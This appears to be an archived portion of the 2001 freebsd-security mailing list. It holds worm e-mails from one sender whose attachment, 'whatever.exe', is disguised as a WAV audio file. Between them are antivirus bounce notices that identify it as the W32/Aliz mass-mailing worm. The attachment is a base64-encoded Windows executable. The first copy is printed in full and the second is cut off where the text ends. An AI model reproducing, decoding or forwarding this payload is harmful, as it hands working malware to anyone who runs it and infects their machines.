security@FreeBSD.ORG Subject: Interesting stuff - check it hehe ;-) Date: Fri,23 Nov 2001 04:13:57 -0000 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="bound" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. --bound Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable peace --bound Content-Type: audio/x-wav; name="whatever.exe" Content-Transfer-Encoding: base64 Content-ID: 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 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ADVq= --bound-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:19:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.appliedcard.com (mail.appliedcard.com [207.43.202.218]) by hub.freebsd.org (Postfix) with ESMTP id 47D6137B435 for ; Fri, 23 Nov 2001 01:16:09 -0800 (PST) From: BocaRaton4@appliedcard.com X-Priority: 3 (Normal) Date: Fri, 23 Nov 2001 04:15:09 -0500 Subject: Report to Recipient(s) To: security@FreeBSD.ORG Message-ID: X-MIMETrack: Serialize by Router on BocaRaton4/WILM/ACS(Release 5.0.5 |September 22, 2000) at 11/23/2001 04:15:33 AM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Incident Information:- Originator: owner-freebsd-security@FreeBSD.ORG Recipients: security@FreeBSD.ORG Subject: Interesting stuff - check it hehe ;-) WARNING: The file whatever.exe you received was infected with the W32/Aliz@MM virus. The file attachment was not successfully cleaned. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:20: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from cygnus.ahlstrom.net (cygnus.ahlstrom.net [141.127.2.8]) by hub.freebsd.org (Postfix) with ESMTP id 3BB6D37B73E for ; Fri, 23 Nov 2001 01:18:10 -0800 (PST) Received: from ahlstromsmtp.ahlstrom.com (ahlstromsmtp.ahlstrom.com [141.127.2.58]) by cygnus.ahlstrom.net (8.9.3/8.9.3) with ESMTP id JAA46044 for ; Fri, 23 Nov 2001 09:17:14 GMT (envelope-from ahlstromsmtp/Ahlstrom@notes.ahlstrom.com) From: ahlstromsmtp/Ahlstrom@notes.ahlstrom.com X-Priority: 3 (Normal) Date: Fri, 23 Nov 2001 11:16:01 +0200 Subject: Report to Recipient(s) To: security@FreeBSD.ORG Message-ID: X-MIMETrack: Serialize by Router on ahlstromsmtp/Ahlstrom(Release 5.0.6a |January 17, 2001) at 23.11.2001 11:17:14 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Incident Information:- Originator: owner-freebsd-security@FreeBSD.ORG Recipients: security@FreeBSD.ORG Subject: Interesting stuff - check it hehe ;-) WARNING: The file whatever.exe you received was infected with the W32/Aliz@MM virus. The file attachment was not successfully cleaned. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:20:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp-1.nordnet.fr (smtp-1.nordnet.fr [194.206.126.239]) by hub.freebsd.org (Postfix) with ESMTP id 0398437B6B8 for ; Fri, 23 Nov 2001 01:18:06 -0800 (PST) Received: from pop-3.nordnet.fr (pop-3.nordnet.fr [192.168.164.131]) by smtp-1.nordnet.fr (8.9.0/8.9.0) with ESMTP id KAA18156 for ; Fri, 23 Nov 2001 10:17:27 +0100 From: root@pop-3.nordnet.fr Received: (from root@localhost) by pop-3.nordnet.fr (8.9.3/8.9.3) id KAA00471 Fri, 23 Nov 2001 10:17:24 +0100 Date: Fri, 23 Nov 2001 10:17:24 +0100 Message-Id: <200111230917.KAA00471@pop-3.nordnet.fr> To: security@FreeBSD.ORG Subject: ALERTE: VIRUS DETECTE DANS UN MESSAGE ENVOYE PAR owner-freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org A L E R T E V I R U S Notre système de détection automatique anti-virus a détecté un virus dans un message qui vous a été envoyé par jflowers@ezo.net. La distribution de ce message a été stoppée. Veuillez vous rapprocher de l'émetteur jflowers@ezo.net pour régler avec lui le problème. ************ Votre PC est-il bien protégé ? Pour une protection performante et autonome, www.securitoo.com/indexml.php est la solution contre tous les virus connus et à venir. ************ Is your PC really protected ? For the best protection, www.securitoo.com/indexml.php is the solution that will protect your PC from all known viruses and viruses to be. ************ V I R U S A L E R T Our anti-virus system has detected a virus in an email sent by jflowers@ezo.net. We have stopped the delivery of this email. We invite you to contact jflowers@ezo.net to solve the problem. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:20:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from horse10.daimi.au.dk (horse10.daimi.au.dk [130.225.18.250]) by hub.freebsd.org (Postfix) with ESMTP id 91FC937B759 for ; Fri, 23 Nov 2001 01:18:21 -0800 (PST) Received: (from root@localhost) by horse10.daimi.au.dk (8.11.6/8.11.6) id fAN9Hpi07830; Fri, 23 Nov 2001 10:17:51 +0100 Date: Fri, 23 Nov 2001 10:17:51 +0100 From: postmaster@daimi.au.dk Message-Id: <200111230917.fAN9Hpi07830@horse10.daimi.au.dk> To: Subject: VIRUS IN YOUR MAIL Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org V I R U S A L E R T Our viruschecker found the 'W32/Aliz-A' virus(es) in your email to the following recipient(s): -> Please check your system for viruses, or ask your system administrator to do so. For your reference, here are the headers from your email: ------------------------- BEGIN HEADERS ----------------------------- Received: from speedy.iie.cnam.fr (system@speedy.iie.cnam.fr [192.70.23.7]) by mbone.iie.cnam.fr (8.9.3/8.9.3) with SMTP id KAA13655 for ; Fri, 23 Nov 2001 10:17:37 +0100 (MET) From: security@FreeBSD.ORG Received: by rubis.iie.cnam.fr (MX V4.2 AXP) id 233; Fri, 23 Nov 2001 10:17:51 MET Date: Fri, 23 Nov 2001 10:17:50 MET To: freebsd-security-digest@FreeBSD.ORG Message-ID: <00A05790.91C13614.233@rubis.iie.cnam.fr> Subject: security-digest V5 #349 -------------------------- END HEADERS ------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:20:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from dispatch1.mail.gxn.net (dispatch1.mail.gxn.net [195.224.255.102]) by hub.freebsd.org (Postfix) with ESMTP id 9B28237B41B for ; Fri, 23 Nov 2001 01:19:49 -0800 (PST) Received: from [195.224.162.195] (helo=lorean.aht.org.uk ident=hidden-user) by dispatch1 with esmtp (Exim 3.22 #1) id 167CWO-0005Cj-00 for security@freebsd.org; Fri, 23 Nov 2001 09:21:20 +0000 Received: from mail.aht.org.uk (not verified[191.9.206.3]) by lorean.aht.org.uk with MailMarshal (4,2,0,0) id ; Fri, 23 Nov 2001 09:27:48 +0000 Received: by EXCHANGE with Internet Mail Service (5.5.2653.19) id ; Fri, 23 Nov 2001 09:17:13 -0000 Message-ID: <13E8590EE45BD411A3460050DA922EE3013630A1@EXCHANGE> From: EXCHANGE Panda Antivirus for Exchange Server To: "'security@FreeBSD.ORG'" Subject: Virus incident Date: Fri, 23 Nov 2001 09:17:11 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Panda Antivirus has found the following viruses in the message: Server : EXCHANGE Sent by : jflowers@ezo.net Address : jflowers@ezo.net To : security@FreeBSD.ORG Subject : Interesting stuff - check it hehe ;-) Date : 23/11/2001 09:17 Exchange has detected a virus in your message. This has been dealt with accordingly. File : Virus : W32/Aliz - Disinfected http://www.pandasoftware.com ********************************************** Visit our website at www.aht.org.uk ********************************************** ##################################################################################### This e-mail message has been scanned for Viruses and Content and cleared by MailMarshal For more information please visit www.marshalsoftware.com ##################################################################################### To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:20:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from dispatch1.mail.gxn.net (dispatch1.mail.gxn.net [195.224.255.102]) by hub.freebsd.org (Postfix) with ESMTP id 2AFCE37B41F for ; Fri, 23 Nov 2001 01:19:54 -0800 (PST) Received: from [195.224.162.195] (helo=lorean.aht.org.uk ident=hidden-user) by dispatch1 with esmtp (Exim 3.22 #1) id 167CWT-0005Ct-00 for security@freebsd.org; Fri, 23 Nov 2001 09:21:25 +0000 Received: from mail.aht.org.uk (not verified[191.9.206.3]) by lorean.aht.org.uk with MailMarshal (4,2,0,0) id ; Fri, 23 Nov 2001 09:27:52 +0000 Received: by EXCHANGE with Internet Mail Service (5.5.2653.19) id ; Fri, 23 Nov 2001 09:17:17 -0000 Message-ID: <13E8590EE45BD411A3460050DA922EE3013630A3@EXCHANGE> From: EXCHANGE Panda Antivirus for Exchange Server To: "'security@FreeBSD.ORG'" Subject: Virus incident Date: Fri, 23 Nov 2001 09:17:15 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Panda Antivirus has found the following viruses in the message: Server : EXCHANGE Sent by : jflowers@ezo.net Address : jflowers@ezo.net To : security@FreeBSD.ORG Subject : Interesting stuff - check it hehe ;-) Date : 23/11/2001 09:17:14 Exchange has detected a virus in your message. This has been dealt with accordingly. File : whatever.exe inside: Interesting stuff - check it hehe ;-) Virus : W32/Aliz - Ignored http://www.pandasoftware.com ********************************************** Visit our website at www.aht.org.uk ********************************************** ##################################################################################### This e-mail message has been scanned for Viruses and Content and cleared by MailMarshal For more information please visit www.marshalsoftware.com ##################################################################################### To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:20:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from peony.ezo.net (peony.ezo.net [206.102.130.11]) by hub.freebsd.org (Postfix) with ESMTP id 133DF37B429 for ; Fri, 23 Nov 2001 01:19:29 -0800 (PST) Received: from localhost (c3-1a119.neo.rr.com [24.93.230.119]) by peony.ezo.net (8.11.0.Beta3/8.11.0.Beta3) with SMTP id fAN9Qw630403 for security@FreeBSD.ORG; Fri, 23 Nov 2001 04:26:59 -0500 (EST) Message-Id: <200111230926.fAN9Qw630403@peony.ezo.net> From: jflowers@ezo.net To: security@FreeBSD.ORG Subject: some shit to see Date: Fri,23 Nov 2001 04:20:09 -0000 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="bound" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. --bound Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable peace --bound Content-Type: audio/x-wav; name="whatever.exe" Content-Transfer-Encoding: base64 Content-ID: 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 